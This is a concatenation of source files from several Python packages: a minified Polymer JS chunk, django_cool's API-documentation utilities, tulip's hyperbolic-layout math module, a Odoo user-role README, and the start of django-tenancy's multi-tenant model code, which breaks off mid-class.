this.__targetIsRTL},_nameChanged:function(){this._meta.value=null,this._meta.key=this.name,this._meta.value=this,this.async((function(){this.fire("iron-iconset-added",this,{node:window})}))},_createIconMap:function(){var t=Object.create(null);return(0,s.vz)(this).querySelectorAll("[id]").forEach((function(e){t[e.id]=e})),t},_cloneIcon:function(t,e){return this._icons=this._icons||this._createIconMap(),this._prepareSvgClone(this._icons[t],this.size,e)},_prepareSvgClone:function(t,e,r){if(t){var o=t.cloneNode(!0),l=document.createElementNS("http://www.w3.org/2000/svg","svg"),s=o.getAttribute("viewBox")||"0 0 "+e+" "+e,i="pointer-events: none; display: block; width: 100%; height: 100%;";return r&&o.hasAttribute("mirror-in-rtl")&&(i+="-webkit-transform:scale(-1,1);transform:scale(-1,1);transform-origin:center;"),l.setAttribute("viewBox",s),l.setAttribute("preserveAspectRatio","xMidYMid meet"),l.setAttribute("focusable","false"),l.style.cssText=i,l.appendChild(o).removeAttribute("id"),l}return null}})},67810:(t,e,r)=>{"use strict";r.d(e,{o:()=>l});r(65233);var o=r(87156);const l={properties:{scrollTarget:{type:HTMLElement,value:function(){return this._defaultScrollTarget}}},observers:["_scrollTargetChanged(scrollTarget, isAttached)"],_shouldHaveListener:!0,_scrollTargetChanged:function(t,e){if(this._oldScrollTarget&&(this._toggleScrollListener(!1,this._oldScrollTarget),this._oldScrollTarget=null),e)if("document"===t)this.scrollTarget=this._doc;else if("string"==typeof t){var r=this.domHost;this.scrollTarget=r&&r.$?r.$[t]:(0,o.vz)(this.ownerDocument).querySelector("#"+t)}else this._isValidScrollTarget()&&(this._oldScrollTarget=t,this._toggleScrollListener(this._shouldHaveListener,t))},_scrollHandler:function(){},get _defaultScrollTarget(){return this._doc},get _doc(){return this.ownerDocument.documentElement},get _scrollTop(){return this._isValidScrollTarget()?this.scrollTarget===this._doc?window.pageYOffset:this.scrollTarget.scrollTop:0},get _scrollLeft(){return 
this._isValidScrollTarget()?this.scrollTarget===this._doc?window.pageXOffset:this.scrollTarget.scrollLeft:0},set _scrollTop(t){this.scrollTarget===this._doc?window.scrollTo(window.pageXOffset,t):this._isValidScrollTarget()&&(this.scrollTarget.scrollTop=t)},set _scrollLeft(t){this.scrollTarget===this._doc?window.scrollTo(t,window.pageYOffset):this._isValidScrollTarget()&&(this.scrollTarget.scrollLeft=t)},scroll:function(t,e){var r;"object"==typeof t?(r=t.left,e=t.top):r=t,r=r||0,e=e||0,this.scrollTarget===this._doc?window.scrollTo(r,e):this._isValidScrollTarget()&&(this.scrollTarget.scrollLeft=r,this.scrollTarget.scrollTop=e)},get _scrollTargetWidth(){return this._isValidScrollTarget()?this.scrollTarget===this._doc?window.innerWidth:this.scrollTarget.offsetWidth:0},get _scrollTargetHeight(){return this._isValidScrollTarget()?this.scrollTarget===this._doc?window.innerHeight:this.scrollTarget.offsetHeight:0},_isValidScrollTarget:function(){return this.scrollTarget instanceof HTMLElement},_toggleScrollListener:function(t,e){var r=e===this._doc?window:e;t?this._boundScrollHandler||(this._boundScrollHandler=this._scrollHandler.bind(this),r.addEventListener("scroll",this._boundScrollHandler)):this._boundScrollHandler&&(r.removeEventListener("scroll",this._boundScrollHandler),this._boundScrollHandler=null)},toggleScrollListener:function(t){this._shouldHaveListener=t,this._toggleScrollListener(t,this.scrollTarget)}}},25782:(t,e,r)=>{"use strict";r(65233),r(65660),r(70019),r(97968);var o=r(9672),l=r(50856),s=r(33760);(0,o.k)({_template:l.d`
<style include="paper-item-shared-styles"></style>
<style>
:host {
@apply --layout-horizontal;
@apply --layout-center;
@apply --paper-font-subhead;
@apply --paper-item;
@apply --paper-icon-item;
}
.content-icon {
@apply --layout-horizontal;
@apply --layout-center;
width: var(--paper-item-icon-width, 56px);
@apply --paper-item-icon;
}
</style>
<div id="contentIcon" class="content-icon">
<slot name="item-icon"></slot>
</div>
<slot></slot>
`,is:"paper-icon-item",behaviors:[s.U]})},89194:(t,e,r)=>{"use strict";r(65233),r(65660),r(70019);var o=r(9672),l=r(50856);(0,o.k)({_template:l.d`
<style>
:host {
overflow: hidden; /* needed for text-overflow: ellipsis to work on ff */
@apply --layout-vertical;
@apply --layout-center-justified;
@apply --layout-flex;
}
:host([two-line]) {
min-height: var(--paper-item-body-two-line-min-height, 72px);
}
:host([three-line]) {
min-height: var(--paper-item-body-three-line-min-height, 88px);
}
:host > ::slotted(*) {
overflow: hidden;
text-overflow: ellipsis;
white-space: nowrap;
}
:host > ::slotted([secondary]) {
@apply --paper-font-body1;
color: var(--paper-item-body-secondary-color, var(--secondary-text-color));
@apply --paper-item-body-secondary;
}
</style>
<slot></slot>
`,is:"paper-item-body"})},40417:(t,e,r)=>{"use strict";r.d(e,{l:()=>i});var o=r(99602),l=r(55122);const s={},i=(0,l.XM)(class extends l.Xe{constructor(){super(...arguments),this.$t=s}render(t,e){return e()}update(t,[e,r]){if(Array.isArray(e)){if(Array.isArray(this.$t)&&this.$t.length===e.length&&e.every(((t,e)=>t===this.$t[e])))return o.Jb}else if(this.$t===e)return o.Jb;return this.$t=Array.isArray(e)?Array.from(e):e,this.render(e,r)}})}}]);
//# sourceMappingURL=chunk.21bdce81c44342769b60.js.map | PypiClean |
/django_cool-1.2.8-py3-none-any.whl/cool/views/utils.py | import copy
from collections import OrderedDict
from importlib import import_module
from django.conf import settings
from django.core.validators import (
BaseValidator, ProhibitNullCharactersValidator,
)
from django.db import models
from django.db.models import NOT_PROVIDED
from django.shortcuts import render
from django.template.loader import render_to_string
from django.utils.translation import gettext as _
from rest_framework import fields, serializers, validators
from rest_framework.fields import empty
from rest_framework.serializers import ModelSerializer
from rest_framework.utils import model_meta
from rest_framework.utils.serializer_helpers import BindingDict
from cool.views.error_code import ErrorCode
from cool.views.view import CoolBFFAPIView
def parse_validation_error(data):
"""
    Process parameter validation results
"""
from django.core.exceptions import ValidationError
from rest_framework.exceptions import (
ValidationError as RestValidationError,
)
if isinstance(data, ValidationError):
if hasattr(data, 'error_dict'):
return parse_validation_error(dict(data))
return parse_validation_error(list(data))
elif isinstance(data, RestValidationError):
return parse_validation_error(data.detail)
elif isinstance(data, dict):
return {key: parse_validation_error(value) for key, value in data.items()}
elif isinstance(data, list):
return [parse_validation_error(item) for item in data]
else:
return data
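# Illustrative usage sketch (``instance`` is a hypothetical model instance):
#
#   try:
#       instance.full_clean()
#   except ValidationError as exc:
#       errors = parse_validation_error(exc)
#       # e.g. {'name': ['This field cannot be blank.']}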
def get_rest_field_from_model_field(model, model_field, **kwargs):
"""
    Automatically generate a rest framework field from a model field
"""
if isinstance(model_field, models.Field):
model_field = model_field.name
s = ModelSerializer()
info = model_meta.get_field_info(model)
for field_name, relation_info in info.forward_relations.items():
if relation_info.to_many:
continue
field = relation_info.model_field
target_field = field
verbose_name = [target_field.verbose_name]
help_text = [target_field.help_text]
while target_field.remote_field:
target_field = target_field.target_field
verbose_name.append(target_field.verbose_name)
help_text.append(target_field.help_text)
target_field = copy.deepcopy(target_field)
target_field.verbose_name = " - ".join(filter(lambda x: x, verbose_name))
target_field.help_text = " - ".join(filter(lambda x: x, help_text))
for attr in ('primary_key', 'blank', 'null', 'default', 'editable', 'serialize'):
if hasattr(field, attr):
setattr(target_field, attr, getattr(field, attr))
info.fields_and_pk[field.name] = target_field
try:
info.fields_and_pk[field.attname] = target_field
except AttributeError:
pass
field_info = info.fields_and_pk[model_field]
field_class, field_kwargs = s.build_field(model_field, info, model, 0)
field_kwargs.pop('read_only', None)
gen_validators = field_kwargs.pop('validators', None)
if gen_validators:
gen_validators = list(filter(
lambda x: not isinstance(x, (
validators.UniqueValidator, validators.BaseUniqueForValidator, ProhibitNullCharactersValidator
)),
gen_validators
))
if gen_validators:
field_kwargs['validators'] = gen_validators
field_kwargs = s.include_extra_kwargs(field_kwargs, kwargs)
if not field_kwargs.get('required') and 'default' not in field_kwargs:
field_kwargs['default'] = None if field_info.default is NOT_PROVIDED else field_info.default
if field_class is fields.BooleanField and field_kwargs['default'] is None:
field_class = fields.NullBooleanField
field_kwargs.pop('allow_null', None)
if not ('default' in kwargs or 'required' in kwargs or field_kwargs.get('required') or field_kwargs['default']):
if (not field_kwargs.get('allow_null', False) and field_kwargs['default'] is None) \
or (not field_kwargs.get('allow_blank', False) and not field_kwargs['default']):
field_kwargs['required'] = True
field_kwargs.pop('default')
return field_class(**field_kwargs)
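# Illustrative usage sketch (``Book`` is a hypothetical model with a ``title``
# CharField); the returned rest_framework field mirrors the model field's
# constraints:
#
#   title_field = get_rest_field_from_model_field(Book, 'title', required=False)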
def get_field_info(field):
"""
    Get field information
"""
field_type = field.__class__.__name__
if field_type.endswith("Field") and field_type != 'Field':
field_type = field_type[:-5]
info = {
'__field__': field,
'label': str(field.label),
'type': field_type,
'default': field.default,
'default_format': '' if field.default is empty else field.default,
'required': field.required,
'required_format': _('Yes') if field.required is True else _('No'),
'help_text': field.help_text,
'extend_info': OrderedDict()
}
field_validators = [field]
field_validators.extend(getattr(field, 'validators', list()))
validator_keys = ['max_value', 'min_value', 'max_length', 'min_length', 'max_digits', 'max_decimal_places',
'choices', 'regex', 'allowed_extensions', 'sep', 'child', 'is_list', 'children', 'serializer']
for validator in field_validators:
for k in validator_keys:
if k == 'choices' and not isinstance(field, fields.ChoiceField):
continue
v = getattr(validator, k, None)
if v is not None:
v = getattr(v, 'pattern', v)
info['extend_info'].setdefault(k, list()).append(v)
if isinstance(validator, BaseValidator):
info['extend_info'].setdefault(validator.code, list()).append(validator.limit_value)
for k in ['max_value', 'max_length', 'max_digits', 'max_decimal_places']:
if k in info['extend_info']:
info['extend_info'][k] = min(info['extend_info'][k])
for k in ['min_value', 'min_length']:
if k in info['extend_info']:
info['extend_info'][k] = max(info['extend_info'][k])
for k in info['extend_info']:
if not isinstance(info['extend_info'][k], list):
continue
if len(info['extend_info'][k]) == 1:
info['extend_info'][k] = info['extend_info'][k].pop()
if 'choices' in info['extend_info']:
info['extend_info'].pop('max_value', None)
info['extend_info'].pop('min_value', None)
if isinstance(field, serializers.BaseSerializer):
if 'child' not in info['extend_info'] and 'children' not in info['extend_info']:
info['extend_info']['detail'] = getattr(field, 'fields', None)
def _format_info(_info):
if isinstance(_info, list):
return "[%s]" % _format_info(_info[0])
if not isinstance(_info, dict):
return ""
if '__field__' in _info:
return _("(%s %s default:%s,required:%s,%s %s)") % (
_info['label'],
_info['type'],
_info['default_format'],
_info['required_format'],
_info['extend_info_format'],
_info['help_text']
)
else:
ret = "; ".join(["%s:%s" % (_k, _format_info(_v)) for _k, _v in _info.items()])
return "{ %s }" % ret
def _format_value(_value):
if isinstance(_value, list):
return ",".join(map(lambda x: _format_value(x) if isinstance(x, dict) else x, _value))
elif isinstance(_value, (dict, BindingDict)):
return ",".join(["%s:%s" % (_k, _format_value(_v)) for _k, _v in _value.items()])
elif isinstance(_value, type) and issubclass(_value, serializers.Serializer):
_info = get_serializer_field_info(_value())
return _format_info(_info)
elif isinstance(_value, fields.Field):
_info = get_field_info(_value)
return _format_info(_info)
else:
return _value
info['extend_info_format'] = "; ".join(["%s:%s" % (k, _format_value(v)) for k, v in info['extend_info'].items()])
return info
def get_serializer_field_info(serializer_obj, force_many=False):
from . import serializer
ret = dict()
if isinstance(serializer_obj, serializer.RecursiveField):
serializer_obj = serializer_obj.get_parent_proxy(2)
if not isinstance(serializer_obj, serializer.RecursiveField):
for field_name, field in serializer_obj.fields.items():
if hasattr(field, 'fields'):
ret[field_name] = get_serializer_field_info(field)
elif hasattr(field, 'child'):
ret[field_name] = get_serializer_field_info(field.child, force_many=True)
elif hasattr(field, 'child_relation'):
ret[field_name] = get_serializer_field_info(field.child_relation, force_many=True)
else:
ret[field_name] = get_field_info(field)
return [ret] if force_many else ret
def get_list_info(serializer_obj):
"""
    Get list serializer information
"""
from . import serializer
child = serializer_obj.child
if isinstance(child, serializer.RecursiveField):
child = child.get_parent_proxy(2)
if hasattr(child, 'fields'):
return get_serializer_info(child, force_many=True)
return [str(serializer_obj.label)]
def get_serializer_info(serializer_obj, force_many=False):
"""
    Get serializer information
"""
from . import serializer
ret = dict()
for field_name, field in serializer_obj.fields.items():
if isinstance(field, serializer.RecursiveField):
field = field.get_parent_proxy(2)
if hasattr(field, 'fields'):
ret[field_name] = get_serializer_info(field)
elif hasattr(field, 'child'):
ret[field_name] = get_list_info(field)
elif hasattr(field, 'child_relation'):
ret[field_name] = [str(field.child_relation.label)]
else:
ret[field_name] = str(field.label)
if isinstance(field, fields.ChoiceField):
choices = ",".join(["%s:%s" % (k, v) for k, v in field.choices.items()])
if choices:
ret[field_name] += " (%s)" % choices
return [ret] if force_many else ret
def get_url(head, urlpattern):
"""
    Build the combined URL
"""
url = getattr(urlpattern, 'pattern', urlpattern).regex.pattern
ret = head + url.replace('\\', '').rstrip("$?").lstrip('^')
return ret.replace('//', '/')
def get_view_list(urlpattern=None, head='/', base_view=CoolBFFAPIView):
"""
    Get the list of all API views
"""
ret = []
if urlpattern is None:
rooturl = import_module(settings.ROOT_URLCONF)
for urlpattern in rooturl.urlpatterns:
ret += get_view_list(urlpattern, get_url(head, urlpattern), base_view=base_view)
return ret
view_class = urlpattern
for sub in ('callback', 'view_class'):
view_class = getattr(view_class, sub, None)
if view_class is None:
break
if view_class is not None and issubclass(view_class, base_view):
retdict = dict()
retdict['view_class'] = view_class
retdict['params'] = dict()
view = view_class()
get_serializer_class = getattr(view, 'get_serializer_class', None)
if get_serializer_class is not None and callable(get_serializer_class):
try:
serializer_class = get_serializer_class()
if serializer_class is not None:
retdict['params'] = serializer_class().fields
except AssertionError:
pass
# retdict['params'] = view_class._meta.param_fields if issubclass(view_class, CoolBFFAPIView) else None
get_view_name = getattr(view, 'get_view_name', None)
if get_view_name is not None and callable(get_view_name):
retdict['name'] = get_view_name()
else:
retdict['name'] = view_class.__name__
retdict['url'] = head.replace('//', '/').rstrip('/')
ret.append(retdict)
if hasattr(urlpattern, 'url_patterns'):
for pattern in urlpattern.url_patterns:
ret += get_view_list(pattern, get_url(head, pattern), base_view=base_view)
return ret
def base_get_view_info(view_class):
request_info = OrderedDict()
serializer_class = getattr(view_class, 'serializer_class', None)
if serializer_class is not None:
serializer = serializer_class()
for key, field in serializer.fields.items():
request_info[key] = get_field_info(field)
return {
'request_info': request_info,
'response_info': {},
'response_info_format': ""
}
def get_api_info(base_view=CoolBFFAPIView, base_params=(), add_base_view_params=True, exclude_views=()):
"""
    Get API information
    :param base_view: base API view class
    :param base_params: common parameters
    :param add_base_view_params: add the base view class's parameters to the common parameters
    :param exclude_views: API views to exclude
"""
base_params = list(base_params)
if add_base_view_params and issubclass(base_view, CoolBFFAPIView):
opt = getattr(base_view, '_meta', None)
param_fields = getattr(opt, 'param_fields', dict())
for param_field in param_fields.keys():
if param_field not in base_params:
base_params.append(param_field)
error_codes = ErrorCode.get_desc_dict()
apis = list()
for v in get_view_list(base_view=base_view):
if issubclass(v['view_class'], exclude_views):
continue
has_file = False
post = False
length = 0
no_len_count = 0
for param, field in v['params'].items():
if isinstance(field, fields.FileField):
has_file = True
post = True
if param in ('pass', 'password'):
post = True
if isinstance(field, fields.CharField):
if field.max_length is None:
no_len_count += 1
else:
length += field.max_length
if no_len_count > 3 or length > 200:
post = True
get_view_info = getattr(v['view_class'], 'get_view_info', None)
if get_view_info and callable(get_view_info):
info = get_view_info()
else:
info = base_get_view_info(v['view_class'])
base_params_num = 0
for base_param in base_params:
if base_param in info['request_info']:
info['request_info'][base_param]['base_param'] = True
info['request_info'].move_to_end(base_param, False)
base_params_num += 1
params = list(info['request_info'].keys())[base_params_num:]
apis.append({
'name': v['name'],
'url': v['url'],
'ul_name': v['url'].replace('/', '_').strip('_'),
'info': info,
'self_params': params,
'suggest_method': 'POST' if post else 'GET',
'content_type': 'multipart/form-data' if has_file else 'application/x-www-form-urlencoded',
})
return {
'base_params': base_params,
'error_codes': error_codes,
'apis': apis
}
def get_api_doc(
request=None,
template_name='cool/views/api_doc.md',
base_view=CoolBFFAPIView,
exclude_params=(),
exclude_base_view_params=True,
exclude_views=()
):
"""
    Generate API documentation
    :param request: the request object
    :param template_name: documentation template
    :param base_view: base API view class
    :param exclude_params: parameters to exclude
    :param exclude_base_view_params: whether to exclude parameters defined on the base view class
    :param exclude_views: API views to exclude
"""
api_info = get_api_info(base_view, exclude_params, exclude_base_view_params, exclude_views)
api_info['server'] = request.build_absolute_uri("/")[:-1] if request is not None else '/'
return render_to_string(template_name, api_info, request)
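# Illustrative URL wiring for the documentation view (not part of the original
# module; the path and view name are assumptions, get_api_doc_html is defined
# below):
#
#   from django.urls import path
#
#   urlpatterns = [
#       path('api/doc/', get_api_doc_html, name='api_doc'),
#   ]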
def get_api_doc_html(
request,
*args,
md_template_name='cool/views/api_doc.md',
base_view=CoolBFFAPIView,
exclude_params=(),
exclude_base_view_params=True,
exclude_views=(),
title=_('Api Document'),
toc_left=True,
**kwargs
):
"""
    Generate API documentation as HTML (markdown converted to HTML; depends on the markdown package)
    :param request: the request object
    :param md_template_name: documentation template
    :param base_view: base API view class
    :param exclude_params: parameters to exclude
    :param exclude_base_view_params: whether to exclude parameters defined on the base view class
    :param exclude_views: API views to exclude
    :param title: document title
    :param toc_left: show the table of contents on the left in wide browsers
"""
md = get_api_doc(
request=request,
template_name=md_template_name,
base_view=base_view,
exclude_params=exclude_params,
exclude_base_view_params=exclude_base_view_params,
exclude_views=exclude_views
)
import markdown
html = markdown.markdown(md, extensions=[
'markdown.extensions.toc',
'markdown.extensions.fenced_code',
'markdown.extensions.tables'
])
md_style_template_name = kwargs.get('md_style_template_name', 'cool/views/markdown.html')
return render(request, md_style_template_name, context={'html': html, 'title': title, 'toc_left': toc_left}) | PypiClean |
/tulip_python-5.7.2-cp37-cp37m-win_amd64.whl/tulip/plugins/layout/h3/h3math.py |
import math
import numpy as np
"""
Scaling factor for compute_radius(), compute_hyperbolic_area(),
compute_delta_theta() and compute_delta_phi().
"""
K = 2.0
"""
The 3D coordinate structure
"""
class Point4d(object):
"""
The constructor for Point4d
:param float x: the x coordinate for a node in cartesian space
:param float y: the y coordinate for a node in cartesian space
:param float z: the z coordinate for a node in cartesian space
"""
def __init__(self, x=0.0, y=0.0, z=0.0, w=1.0):
self.x = x
self.y = y
self.z = z
self.w = w
"""
Transform coordinate from spherical space to cartesian space
    :param float theta: the theta coordinate for a node in spherical space,
    the azimuthal angle
    :param float phi: the phi coordinate for a node in spherical space,
    the polar (inclination) angle
:param float r: the radius for a node in spherical space, radial distance
"""
def sph_to_cart(self, theta, phi, r):
self.x = r * math.sin(phi) * math.cos(theta)
self.y = r * math.sin(phi) * math.sin(theta)
self.z = r * math.cos(phi)
"""
Add an offset to a node's coordinate in cartesian space
:param Point4d offset: the offset to be added to current node's coordinate
"""
def cart_offset(self, offset):
self.x += offset.x
self.y += offset.y
self.z += offset.z
"""
Translate node's coordinate in cartesian space by translation matrix
:param Point4d offset: the offset to be added to current node's coordinate
"""
def translate(self, offset):
translation_matrix = np.array([[1, 0, 0, offset.x],
[0, 1, 0, offset.y],
[0, 0, 1, offset.z],
[0, 0, 0, 1]])
target = translation_matrix.dot(np.array([self.x, self.y,
self.z, self.w]))
self.x, self.y, self.z, self.w = (target[0], target[1],
target[2], target[3])
"""
    Transform the node's coordinate in cartesian space by a rotation matrix
    built from spherical space coordinate values
    :param float theta: the theta coordinate for a node in spherical space,
    the azimuthal angle
    :param float phi: the phi coordinate for a node in spherical space,
    the polar (inclination) angle
"""
def coordinate_transformation(self, theta, phi):
rotation_matrix = rotation_matrix_z(theta).dot(rotation_matrix_y(phi))
target = rotation_matrix.dot(np.array([self.x, self.y,
self.z, self.w]))
self.x, self.y, self.z, self.w = (target[0], target[1],
target[2], target[3])
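# Illustrative usage sketch (not part of the original module):
#
#   p = Point4d()
#   p.sph_to_cart(theta=math.pi / 4, phi=math.pi / 3, r=1.0)
#   p.translate(Point4d(1.0, 0.0, 0.0))
#   p.coordinate_transformation(theta=math.pi / 4, phi=math.pi / 3)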
"""
Compute the node's hemisphere radius from its reserved hemisphere space
:returns: return the node's radius as a float
"""
def compute_radius(H_p):
return K * math.asinh(math.sqrt(H_p / (2 * math.pi * K * K)))
"""
Compute a node's hyperbolic space reservation (hemisphere area) from its
hemisphere radius, used when sizing the parent node's hemisphere
:returns: return the node's hemisphere space reservation as a float
"""
def compute_hyperbolic_area(radius):
beta = 1.00
return 2 * math.pi * (math.cosh(radius / K) - 1.0) * beta
"""
Compute the proper delta theta value for a node's hemisphere placement,
i.e. a space reservation the size of the node's hemisphere radius
:returns: return the node's half hemisphere space reservation as the angle
delta_theta in spherical space, as a float number
"""
def compute_delta_theta(r, rp, phi):
return math.atan(math.tanh(r / K) /
(math.sinh(rp / K) * math.sinh(phi)))
"""
Compute the proper delta phi value for a band of nodes' hemisphere placement,
i.e. a space reservation the size of the largest node's hemisphere
radius in the whole band
:returns: return the nodes' max half hemisphere space reservation in the same
band as the angle delta_phi in spherical space, as a float number
"""
def compute_delta_phi(r, rp):
return math.atan(math.tanh(r / K) / math.sinh(rp / K))
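# Illustrative worked example (approximate values, not part of the original
# module): with K = 2.0, compute_radius(100.0) ≈ 2.88, and a child hemisphere
# of radius 2.88 claims compute_hyperbolic_area(2.88) ≈ 7.74 on its parent;
# compute_delta_theta() and compute_delta_phi() then give the angular steps
# used to place sibling hemispheres.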
"""
The Klein metric for visualizing hyperbolic space: unusual uses of 4x4 matrices
by Phillips and Gunn
"""
def minkowski(x, y):
return (x.x * y.x + x.y * y.y + x.z * y.z - x.w * y.w)
"""
Calculate the 3D hyperbolic distance using the Klein metric
"""
def hyperbolic_distance(x, y):
t1 = minkowski(x, y)
t2 = minkowski(x, x)
t3 = minkowski(y, y)
return (2 * math.acosh(((t1 * t1) / (t2 * t3))**2))
"""
Rotation matrix around X axis
:param angle: the angle for rotating around the X axis
:returns: return the rotation matrix around the X axis by the given angle
"""
def rotation_matrix_x(angle):
return np.array([[1, 0, 0, 0],
[0, math.cos(angle), -1 * math.sin(angle), 0],
[0, math.sin(angle), math.cos(angle), 0],
[0, 0, 0, 1]])
"""
Rotation matrix around Y axis
:param angle: the angle for rotating around the Y axis
:returns: return the rotation matrix around the Y axis by the given angle
"""
def rotation_matrix_y(angle):
return np.array([[math.cos(angle), 0, math.sin(angle), 0],
[0, 1, 0, 0],
[-1 * math.sin(angle), 0, math.cos(angle), 0],
[0, 0, 0, 1]])
"""
Rotation matrix around Z axis
:param angle: the angle for rotating around the Z axis
:returns: return the rotation matrix around the Z axis by the given angle
"""
def rotation_matrix_z(angle):
return np.array([[math.cos(angle), -1 * math.sin(angle), 0, 0],
[math.sin(angle), math.cos(angle), 0, 0],
[0, 0, 1, 0],
[0, 0, 0, 1]]) | PypiClean |
/odoo12_addon_base_user_role-12.0.2.1.3-py3-none-any.whl/odoo/addons/base_user_role/readme/DESCRIPTION.rst | This module was written to extend the standard functionality regarding users
and groups management.
It helps create well-defined user roles and associate them with users.
It can become very hard to maintain a large number of user profiles over time,
juggling with many technical groups. For this purpose, this module will help
you to:
* define functional roles by aggregating low-level groups,
* set user accounts with the predefined roles (roles are cumulative),
* update groups of all relevant user accounts (all at once),
* ensure that user accounts will have the groups defined in their roles
  (nothing more, nothing less). In other words, you cannot set groups
  manually on a user as long as roles are configured on it,
* activate/deactivate roles depending on the date (useful to plan holidays, etc)
* get a quick overview of roles and the related user accounts.
That way you make clear the different responsibilities within a company, and
are able to add and update user accounts in a scalable and reliable way.
| PypiClean |
/django-tenancy-0.3.1a3.tar.gz/django-tenancy-0.3.1a3/tenancy/models.py | from __future__ import unicode_literals
import copy
import logging
from abc import ABCMeta
from collections import OrderedDict
from contextlib import contextmanager
import django
from django.apps import apps
from django.core.exceptions import ImproperlyConfigured
from django.db import connection, models
from django.db.models.base import ModelBase, subclass_exception
from django.db.models.deletion import DO_NOTHING
from django.db.models.fields import Field
from django.dispatch.dispatcher import receiver
from django.utils.deconstruct import deconstructible
from django.utils.six import itervalues, string_types, with_metaclass
from django.utils.six.moves import copyreg
from . import get_tenant_model, settings
from .compat import (
get_private_fields, get_remote_field, get_remote_field_model,
lazy_related_operation, set_remote_field_model,
)
from .management import create_tenant_schema, drop_tenant_schema
from .managers import (
AbstractTenantManager, TenantManager, TenantModelManagerDescriptor,
)
from .signals import lazy_class_prepared
from .utils import (
clear_cached_properties, clear_opts_related_cache, disconnect_signals,
get_model, receivers_for_model, remove_from_app_cache,
)
class TenantModels(object):
__slots__ = ['references']
def __init__(self, tenant):
self.references = OrderedDict((
(reference, reference.for_tenant(tenant))
for reference in TenantModelBase.references
))
def __getitem__(self, key):
return self.references[key]
def __iter__(self, **kwargs):
return itervalues(self.references, **kwargs)
class TenantModelsDescriptor(object):
def contribute_to_class(self, cls, name):
self.name = name
self.tenant_models = {}
setattr(cls, name, self)
def __get__(self, instance, owner):
if instance is None:
return self
try:
return instance.__dict__[self.name]
except KeyError:
pass
tenant_key = instance.natural_key()
try:
models = self.tenant_models[tenant_key]
except KeyError:
models = self.tenant_models[tenant_key] = TenantModels(instance)
self.__set__(instance, models)
return models
def __set__(self, instance, value):
instance.__dict__[self.name] = value
def __delete__(self, instance):
try:
# Use the instance assigned values if available.
models = instance.__dict__[self.name]
except KeyError:
tenant_key = instance.natural_key()
try:
models = self.tenant_models[tenant_key]
except KeyError:
return
for model in models:
model.destroy()
class AbstractTenant(models.Model):
ATTR_NAME = 'tenant'
objects = AbstractTenantManager()
class Meta:
abstract = True
def save(self, *args, **kwargs):
created = not self.pk
save = super(AbstractTenant, self).save(*args, **kwargs)
if created:
create_tenant_schema(self)
return save
def delete(self, *args, **kwargs):
delete = super(AbstractTenant, self).delete(*args, **kwargs)
drop_tenant_schema(self)
return delete
def natural_key(self):
raise NotImplementedError
models = TenantModelsDescriptor()
@contextmanager
def as_global(self):
"""
        Expose this tenant as a thread-local object. This is required by parts
        of Django relying on global state such as authentication backends.
"""
setattr(connection, self.ATTR_NAME, self)
try:
yield
finally:
delattr(connection, self.ATTR_NAME)
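    # Illustrative usage sketch (not part of the original module):
    #
    #   with tenant.as_global():
    #       # global state is visible to e.g. authentication backends
    #       assert tenant.get_global() is tenant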
@classmethod
def get_global(cls):
return getattr(connection, cls.ATTR_NAME, None)
@property
def model_name_prefix(self):
return "Tenant_%s" % '_'.join(self.natural_key())
@property
def db_schema(self):
return "tenant_%s" % '_'.join(self.natural_key())
class Tenant(AbstractTenant):
name = models.CharField(unique=True, max_length=20)
objects = TenantManager()
class Meta:
swappable = 'TENANCY_TENANT_MODEL'
def natural_key(self):
return (self.name,)
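# Illustrative usage sketch (not part of the original module; ``TenantModel``
# is the tenant-aware base class exposed by this app and ``Article`` is a
# hypothetical model):
#
#   class Article(TenantModel):
#       title = models.CharField(max_length=100)
#
#       class TenantMeta:
#           related_name = 'articles'
#
#   tenant = Tenant.objects.create(name='acme')
#   tenant.articles  # gives access to the tenant-specific Article model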
@deconstructible
class Managed(object):
"""
Sentinel object used to detect tenant managed models.
"""
def __init__(self, tenant_model):
self.tenant_model = tenant_model
def __bool__(self):
# Evaluates to False in order to prevent Django from managing the model.
return False
# Remove when dropping support for Python 2.7
__nonzero__ = bool
def __eq__(self, other):
return isinstance(other, Managed) and other.tenant_model == self.tenant_model
def meta(Meta=None, **opts):
"""
Create a class with specified opts as attributes to be used as model
definition options.
"""
if Meta:
opts = dict(Meta.__dict__, **opts)
return type(str('Meta'), (), opts)
def db_schema_table(tenant, db_table):
if connection.vendor == 'postgresql':
# See https://code.djangoproject.com/ticket/6148#comment:47
return '%s\".\"%s' % (tenant.db_schema, db_table)
else:
return "%s_%s" % (tenant.db_schema, db_table)
class Reference(object):
__slots__ = ['model', 'bases', 'Meta', 'related_names']
def __init__(self, model, Meta, related_names=None):
self.model = model
self.Meta = Meta
self.related_names = related_names
def object_name_for_tenant(self, tenant):
return "%s_%s" % (
tenant.model_name_prefix,
self.model._meta.object_name
)
def for_tenant(self, tenant):
app_label = self.model._meta.app_label
object_name = self.object_name_for_tenant(tenant)
return "%s.%s" % (app_label, object_name)
class TenantSpecificModel(with_metaclass(ABCMeta)):
@classmethod
def __subclasshook__(cls, subclass):
if isinstance(subclass, TenantModelBase):
try:
tenant_model = get_tenant_model()
except ImproperlyConfigured:
# If the tenant model is not configured yet we can assume
# no specific models have been defined so far.
return False
tenant = getattr(subclass, tenant_model.ATTR_NAME, None)
return isinstance(tenant, tenant_model)
return NotImplemented
class TenantDescriptor(object):
__slots__ = ['natural_key']
def __init__(self, tenant):
self.natural_key = tenant.natural_key()
def __get__(self, model, owner):
tenant_model = get_tenant_model()
return tenant_model._default_manager.get_by_natural_key(*self.natural_key)
class TenantApps(object):
def __init__(self, tenant, apps):
self.apps = apps
self.natural_key = tenant.natural_key()
def get_models(self, *args, **kwargs):
models = self.apps.get_models(*args, **kwargs)
return [
model for model in models
if not issubclass(model, TenantSpecificModel) or model._meta.apps.natural_key == self.natural_key
]
def __getattr__(self, name):
return getattr(self.apps, name)
class TenantModelBase(ModelBase):
reference = Reference
references = OrderedDict()
tenant_model_class = None
exceptions = ('DoesNotExist', 'MultipleObjectsReturned')
def __new__(cls, name, bases, attrs):
super_new = super(TenantModelBase, cls).__new__
Meta = attrs.setdefault('Meta', meta())
if (getattr(Meta, 'abstract', False) or
any(issubclass(base, TenantSpecificModel) for base in bases)):
# Abstract model definition and ones subclassing tenant specific
# ones shouldn't get any special treatment.
model = super_new(cls, name, bases, attrs)
if not cls.tenant_model_class:
cls.tenant_model_class = model
else:
# Store managers to replace them with a descriptor specifying they
# can't be accessed this way.
managers = set(
name for name, attr in attrs.items()
if isinstance(attr, models.Manager)
)
# There's always a default manager named `objects`.
managers.add('objects')
if getattr(Meta, 'proxy', False):
model = super_new(
cls, name, bases,
